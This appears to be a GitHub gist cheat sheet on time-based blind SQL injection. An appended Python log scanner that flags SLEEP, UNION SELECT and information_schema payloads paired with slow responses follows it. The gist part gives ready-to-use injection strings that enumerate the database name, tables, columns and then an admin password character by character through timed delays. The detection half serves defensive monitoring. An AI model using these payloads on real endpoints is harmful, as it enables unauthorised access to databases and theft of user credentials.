@v801
Last active August 16, 2023 20:28
Time-Based Blind SQL Injection
A correct guess is indicated by how long the query takes to complete.
The delay is introduced with a built-in function such as SLEEP(x) inside an injected UNION SELECT statement.
SLEEP() only runs when the injected UNION SELECT executes and its WHERE condition matches, so a delayed response signals that the guessed value was right.

Base query example

/endpoint?query=admin123' 

Attack query example

/endpoint?query=admin123' UNION SELECT SLEEP(5),2 where database() like 'a%';--

Process flow

Cycle through candidate characters one position at a time; when a character produces the delay it is confirmed, so move on to the next position and repeat.

Start by enumerating the db name

UNION SELECT SLEEP(5),2 where database() like 'a%';--

After finding the db name, enum the table name the same way

UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'found_db' and table_name like 'a%';--

Verify found table name

UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'found_db' and table_name='found_table';--

After finding the table name, enum possible column names

UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='found_db' and TABLE_NAME='found_table' and COLUMN_NAME like 'a%';

Exclude already discovered columns and repeat

UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='found_db' and TABLE_NAME='found_table' and COLUMN_NAME like 'a%' and COLUMN_NAME !='found_col';

Enum values in found column

UNION SELECT SLEEP(5),2 from found_table where found_col like 'a%

Enum the next value in the column; example for a basic users table

UNION SELECT SLEEP(5),2 from users where username='admin' and password like 'a%
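From the detection side, as an added example that is not part of the gist: the Python below scans constructed access-log lines for the traces the payloads above leave behind (the SLEEP()/BENCHMARK() delay primitive, the UNION SELECT carrier, information_schema lookups) and correlates them with response time, which is the page's own signal. The log format, the 4000 ms threshold and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the gist): "METHOD TARGET STATUS RESPONSE_MS".
# Lines 2-4 are URL-encoded forms of the gist's payloads; line 5 is benign but contains "sleep".
SAMPLE_LOG = """\
GET /endpoint?query=admin123 200 12
GET /endpoint?query=admin123%27%20UNION%20SELECT%20SLEEP(5),2%20where%20database()%20like%20%27a%25%27;-- 200 5014
GET /endpoint?query=admin123%27%20UNION%20SELECT%20SLEEP(5),2%20where%20database()%20like%20%27b%25%27;-- 200 9
GET /endpoint?query=admin123%27%20UNION%20SELECT%20SLEEP(5),2%20FROM%20information_schema.tables%20WHERE%20table_schema=%27found_db%27%20and%20table_name%20like%20%27u%25%27;-- 200 5021
GET /search?q=sleep%20apnea 200 30
"""

LINE_RE = re.compile(r"^(?P<method>\S+) (?P<target>\S+) (?P<status>\d{3}) (?P<ms>\d+)$")

# Indicators lifted from the gist's payloads: a MySQL delay primitive, the UNION SELECT
# it rides on, and the information_schema lookups used to enumerate tables and columns.
DELAY_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
SCHEMA_RE = re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)


def decode_query(target):
    """URL-decode the query string twice so double-encoded payloads are caught too."""
    return unquote_plus(unquote_plus(urlsplit(target).query))


def classify(line, delay_threshold_ms=4000):
    """Return the indicator tags for one log line; an empty list means clean."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsable"]
    text = decode_query(m["target"])
    tags = []
    has_union = bool(UNION_RE.search(text))
    if has_union:
        tags.append("union_select")
    if DELAY_RE.search(text):
        tags.append("delay_function")
    if SCHEMA_RE.search(text):
        tags.append("schema_enum")
    # The gist's own signal: the response stalls only when the guessed condition
    # is true, so SQL syntax plus a slow response is the strongest hit.
    if has_union and int(m["ms"]) >= delay_threshold_ms:
        tags.append("timing_hit")
    return tags


def scan(log_text):
    """Classify every non-empty line; returns (line, tags) pairs in order."""
    return [(line, classify(line)) for line in log_text.splitlines() if line.strip()]
```

Run `scan(SAMPLE_LOG)` to see each line's tags; pairing the syntax match with the timing anomaly is what separates a real enumeration run from a noisy scanner.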